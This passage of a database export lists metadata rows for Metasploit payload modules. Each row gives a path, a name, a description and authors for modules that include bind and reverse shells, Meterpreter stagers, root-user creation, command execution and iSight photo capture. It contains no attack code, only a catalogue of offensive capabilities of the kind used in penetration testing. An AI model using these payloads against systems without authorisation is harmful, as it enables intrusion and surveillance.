00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/debug_trap.rb","payload","generic/debug_trap","payload/generic/debug_trap","Generic x86 Debug Trap",300,"Generate a debug trap in the target process","Metasploit Framework License (BSD)","f",,,,,"t",,"robert " 2067,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/shell_bind_tcp.rb","payload","generic/shell_bind_tcp","payload/generic/shell_bind_tcp","Generic Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"skape " 2068,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/shell_reverse_tcp.rb","payload","generic/shell_reverse_tcp","payload/generic/shell_reverse_tcp","Generic Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"skape " 2069,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/tight_loop.rb","payload","generic/tight_loop","payload/generic/tight_loop","Generic x86 Tight Loop",300,"Generate a tight loop in the target process","Metasploit Framework License (BSD)","f",,,,,"t",,"jduck " 2070,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/java/jsp_shell_bind_tcp.rb","payload","java/jsp_shell_bind_tcp","payload/java/jsp_shell_bind_tcp","Java JSP Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2071,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb","payload","java/jsp_shell_reverse_tcp","payload/java/jsp_shell_reverse_tcp","Java JSP Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2072,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/bind_tcp.rb","payload","java/meterpreter/bind_tcp","payload/java/meterpreter/bind_tcp","Java Meterpreter, Java Bind TCP Stager",300,"Listen for a connection, Run a meterpreter server in Java","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi" 2073,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/reverse_http.rb","payload","java/meterpreter/reverse_http","payload/java/meterpreter/reverse_http","Java Meterpreter, Java Reverse HTTP Stager",300,"Tunnel communication over HTTP, Run a meterpreter server in Java","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , hdm , mihi" 2074,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/reverse_https.rb","payload","java/meterpreter/reverse_https","payload/java/meterpreter/reverse_https","Java Meterpreter, Java Reverse HTTPS Stager",300,"Tunnel communication over HTTPS, Run a meterpreter server in Java","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , hdm , mihi" 2075,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/reverse_tcp.rb","payload","java/meterpreter/reverse_tcp","payload/java/meterpreter/reverse_tcp","Java Meterpreter, Java Reverse TCP Stager",300,"Connect back stager, Run a meterpreter server in Java","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi" 2076,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/bind_tcp.rb","payload","java/shell/bind_tcp","payload/java/shell/bind_tcp","Command Shell, Java Bind TCP Stager",300,"Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi" 2077,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/reverse_tcp.rb","payload","java/shell/reverse_tcp","payload/java/shell/reverse_tcp","Command Shell, Java Reverse TCP Stager",300,"Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi" 2078,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/java/shell_reverse_tcp.rb","payload","java/shell_reverse_tcp","payload/java/shell_reverse_tcp","Java Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"egypt , mihi" 2079,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/armle/adduser.rb","payload","linux/armle/adduser","payload/linux/armle/adduser","Linux Add User",300,"Create a new user with UID 0","Metasploit Framework License (BSD)","t",,,,,"t",,"Jonathan Salwan" 2080,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/armle/exec.rb","payload","linux/armle/exec","payload/linux/armle/exec","Linux Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"Jonathan Salwan" 2081,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/armle/shell_bind_tcp.rb","payload","linux/armle/shell_bind_tcp","payload/linux/armle/shell_bind_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect to target and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"civ, hal" 2082,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb","payload","linux/armle/shell_reverse_tcp","payload/linux/armle/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"civ" 2083,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb","payload","linux/mipsbe/shell_reverse_tcp","payload/linux/mipsbe/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes" 2084,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb","payload","linux/mipsle/shell_bind_tcp","payload/linux/mipsle/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Vlatko Kosturjak" 2085,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb","payload","linux/mipsle/shell_reverse_tcp","payload/linux/mipsle/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes" 2086,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb","payload","linux/ppc/shell_bind_tcp","payload/linux/ppc/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2087,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc/shell_find_port.rb","payload","linux/ppc/shell_find_port","payload/linux/ppc/shell_find_port","Linux Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2088,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb","payload","linux/ppc/shell_reverse_tcp","payload/linux/ppc/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2089,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb","payload","linux/ppc64/shell_bind_tcp","payload/linux/ppc64/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2090,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc64/shell_find_port.rb","payload","linux/ppc64/shell_find_port","payload/linux/ppc64/shell_find_port","Linux Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2091,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb","payload","linux/ppc64/shell_reverse_tcp","payload/linux/ppc64/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2092,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x64/exec.rb","payload","linux/x64/exec","payload/linux/x64/exec","Linux Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"ricky" 2093,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x64/bind_tcp.rb","payload","linux/x64/shell/bind_tcp","payload/linux/x64/shell/bind_tcp","Linux Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ricky" 2094,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x64/reverse_tcp.rb","payload","linux/x64/shell/reverse_tcp","payload/linux/x64/shell/reverse_tcp","Linux Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ricky" 2095,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x64/shell_bind_tcp.rb","payload","linux/x64/shell_bind_tcp","payload/linux/x64/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"ricky" 2096,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x64/shell_find_port.rb","payload","linux/x64/shell_find_port","payload/linux/x64/shell_find_port","Linux Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"mak" 2097,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb","payload","linux/x64/shell_reverse_tcp","payload/linux/x64/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"ricky" 2098,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/adduser.rb","payload","linux/x86/adduser","payload/linux/x86/adduser","Linux Add User",300,"Create a new user with UID 0","Metasploit Framework License (BSD)","t",,,,,"t",,"skape , spoonm , vlad902 " 2099,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/chmod.rb","payload","linux/x86/chmod","payload/linux/x86/chmod","Linux Chmod",300,"Runs chmod on specified file with specified mode","BSD License","f",,,,,"t",,"kris katterjohn " 2100,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/exec.rb","payload","linux/x86/exec","payload/linux/x86/exec","Linux Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2101,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb","payload","linux/x86/meterpreter/bind_ipv6_tcp","payload/linux/x86/meterpreter/bind_ipv6_tcp","Linux Meterpreter, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , kris katterjohn " 2102,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb","payload","linux/x86/meterpreter/bind_nonx_tcp","payload/linux/x86/meterpreter/bind_nonx_tcp","Linux Meterpreter, Bind TCP Stager",300,"Listen for a connection, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape " 2103,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_tcp.rb","payload","linux/x86/meterpreter/bind_tcp","payload/linux/x86/meterpreter/bind_tcp","Linux Meterpreter, Bind TCP Stager",300,"Listen for a connection, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape " 2104,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/find_tag.rb","payload","linux/x86/meterpreter/find_tag","payload/linux/x86/meterpreter/find_tag","Linux Meterpreter, Find Tag Stager",300,"Use an established connection, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape " 2105,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb","payload","linux/x86/meterpreter/reverse_ipv6_tcp","payload/linux/x86/meterpreter/reverse_ipv6_tcp","Linux Meterpreter, Reverse TCP Stager (IPv6)",300,"Connect back to attacker over IPv6, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , kris katterjohn " 2106,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb","payload","linux/x86/meterpreter/reverse_nonx_tcp","payload/linux/x86/meterpreter/reverse_nonx_tcp","Linux Meterpreter, Reverse TCP Stager",300,"Connect back to the attacker, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape " 2107,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_tcp.rb","payload","linux/x86/meterpreter/reverse_tcp","payload/linux/x86/meterpreter/reverse_tcp","Linux Meterpreter, Reverse TCP Stager",300,"Connect back to the attacker, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape " 2108,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb","payload","linux/x86/metsvc_bind_tcp","payload/linux/x86/metsvc_bind_tcp","Linux Meterpreter Service, Bind TCP",300,"Stub payload for interacting with a Meterpreter Service","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2109,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb","payload","linux/x86/metsvc_reverse_tcp","payload/linux/x86/metsvc_reverse_tcp","Linux Meterpreter Service, Reverse TCP Inline",300,"Stub payload for interacting with a Meterpreter Service","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2110,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/read_file.rb","payload","linux/x86/read_file","payload/linux/x86/read_file","Linux Read File",300,"Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor","Metasploit Framework License (BSD)","f",,,,,"t",,"hal" 2111,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb","payload","linux/x86/shell/bind_ipv6_tcp","payload/linux/x86/shell/bind_ipv6_tcp","Linux Command Shell, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , kris katterjohn , skape " 2112,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb","payload","linux/x86/shell/bind_nonx_tcp","payload/linux/x86/shell/bind_nonx_tcp","Linux Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2113,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_tcp.rb","payload","linux/x86/shell/bind_tcp","payload/linux/x86/shell/bind_tcp","Linux Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , skape " 2114,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/find_tag.rb","payload","linux/x86/shell/find_tag","payload/linux/x86/shell/find_tag","Linux Command Shell, Find Tag Stager",300,"Use an established connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2115,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb","payload","linux/x86/shell/reverse_ipv6_tcp","payload/linux/x86/shell/reverse_ipv6_tcp","Linux Command Shell, Reverse TCP Stager (IPv6)",300,"Connect back to attacker over IPv6, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"kris katterjohn , skape " 2116,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb","payload","linux/x86/shell/reverse_nonx_tcp","payload/linux/x86/shell/reverse_nonx_tcp","Linux Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2117,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_tcp.rb","payload","linux/x86/shell/reverse_tcp","payload/linux/x86/shell/reverse_tcp","Linux Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , skape " 2118,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb","payload","linux/x86/shell_bind_ipv6_tcp","payload/linux/x86/shell_bind_ipv6_tcp","Linux Command Shell, Bind TCP Inline (IPv6)",300,"Listen for a connection over IPv6 and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn " 2119,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_bind_tcp.rb","payload","linux/x86/shell_bind_tcp","payload/linux/x86/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2120,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_find_port.rb","payload","linux/x86/shell_find_port","payload/linux/x86/shell_find_port","Linux Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2121,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_find_tag.rb","payload","linux/x86/shell_find_tag","payload/linux/x86/shell_find_tag","Linux Command Shell, Find Tag Inline",300,"Spawn a shell on an established connection (proxy/nat safe)","Metasploit Framework License (BSD)","f",,,,,"t",,"skape " 2122,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb","payload","linux/x86/shell_reverse_tcp","payload/linux/x86/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2123,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb","payload","linux/x86/shell_reverse_tcp2","payload/linux/x86/shell_reverse_tcp2","Linux Command Shell, Reverse TCP Inline - Metasm Demo",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes , Yoann Guillot, skape " 2124,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/netware/reverse_tcp.rb","payload","netware/shell/reverse_tcp","payload/netware/shell/reverse_tcp","NetWare Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Connect to the NetWare console (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"toto" 2125,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/armle/bind_tcp.rb","payload","osx/armle/execute/bind_tcp","payload/osx/armle/execute/bind_tcp","OS X Write and Execute Binary, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2126,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/armle/reverse_tcp.rb","payload","osx/armle/execute/reverse_tcp","payload/osx/armle/execute/reverse_tcp","OS X Write and Execute Binary, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2127,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/armle/bind_tcp.rb","payload","osx/armle/shell/bind_tcp","payload/osx/armle/shell/bind_tcp","OS X Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2128,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/armle/reverse_tcp.rb","payload","osx/armle/shell/reverse_tcp","payload/osx/armle/shell/reverse_tcp","OS X Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2129,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/armle/shell_bind_tcp.rb","payload","osx/armle/shell_bind_tcp","payload/osx/armle/shell_bind_tcp","Apple iOS Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2130,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb","payload","osx/armle/shell_reverse_tcp","payload/osx/armle/shell_reverse_tcp","Apple iOS Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2131,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/armle/vibrate.rb","payload","osx/armle/vibrate","payload/osx/armle/vibrate","Apple iOS iPhone Vibrate",300,"Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller .","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2132,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/ppc/bind_tcp.rb","payload","osx/ppc/shell/bind_tcp","payload/osx/ppc/shell/bind_tcp","OS X Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2133,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/ppc/find_tag.rb","payload","osx/ppc/shell/find_tag","payload/osx/ppc/shell/find_tag","OS X Command Shell, Find Tag Stager",300,"Use an established connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2134,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/ppc/reverse_tcp.rb","payload","osx/ppc/shell/reverse_tcp","payload/osx/ppc/shell/reverse_tcp","OS X Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2135,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb","payload","osx/ppc/shell_bind_tcp","payload/osx/ppc/shell_bind_tcp","OS X Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2136,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb","payload","osx/ppc/shell_reverse_tcp","payload/osx/ppc/shell_reverse_tcp","OS X Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2137,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x64/bind_tcp.rb","payload","osx/x64/dupandexecve/bind_tcp","payload/osx/x64/dupandexecve/bind_tcp","OS X dup2 Command Shell, Bind TCP Stager",300,"Listen, read length, read buffer, execute, dup2 socket in edi, then execve","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"nemo, nemo " 2138,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x64/reverse_tcp.rb","payload","osx/x64/dupandexecve/reverse_tcp","payload/osx/x64/dupandexecve/reverse_tcp","OS X dup2 Command Shell, Reverse TCP Stager",300,"Connect, read length, read buffer, execute, dup2 socket in edi, then execve","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"nemo, nemo " 2139,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/exec.rb","payload","osx/x64/exec","payload/osx/x64/exec","OS X x64 Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"argp " 2140,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/say.rb","payload","osx/x64/say","payload/osx/x64/say","OSX X64 say Shellcode",300,"Say an arbitrary string outloud using Mac OS X text2speech","Metasploit Framework License (BSD)","f",,,,,"t",,"nemo " 2141,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/shell_bind_tcp.rb","payload","osx/x64/shell_bind_tcp","payload/osx/x64/shell_bind_tcp","OS X x64 Shell Bind TCP",300,"Bind an arbitrary command to an arbitrary port","Metasploit Framework License (BSD)","f",,,,,"t",,"nemo " 2142,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/shell_find_tag.rb","payload","osx/x64/shell_find_tag","payload/osx/x64/shell_find_tag","OSX Command Shell, Find Tag Inline",300,"Spawn a shell on an established connection (proxy/nat safe)","Metasploit Framework License (BSD)","f",,,,,"t",,"nemo " 2143,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb","payload","osx/x64/shell_reverse_tcp","payload/osx/x64/shell_reverse_tcp","OS X x64 Shell Reverse TCP",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"nemo " 2144,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/bind_tcp.rb","payload","osx/x86/bundleinject/bind_tcp","payload/osx/x86/bundleinject/bind_tcp","Mac OS X Inject Mach-O Bundle, Bind TCP Stager",300,"Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2145,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/reverse_tcp.rb","payload","osx/x86/bundleinject/reverse_tcp","payload/osx/x86/bundleinject/reverse_tcp","Mac OS X Inject Mach-O Bundle, Reverse TCP Stager",300,"Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2146,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/exec.rb","payload","osx/x86/exec","payload/osx/x86/exec","OS X Execute Command",300,"Execute an arbitrary command","BSD License","f",,,,,"t",,"argp , snagg " 2147,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/bind_tcp.rb","payload","osx/x86/isight/bind_tcp","payload/osx/x86/isight/bind_tcp","Mac OS X x86 iSight Photo Capture, Bind TCP Stager",300,"Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2148,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/reverse_tcp.rb","payload","osx/x86/isight/reverse_tcp","payload/osx/x86/isight/reverse_tcp","Mac OS X x86 iSight Photo Capture, Reverse TCP Stager",300,"Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2149,"2013-05-07 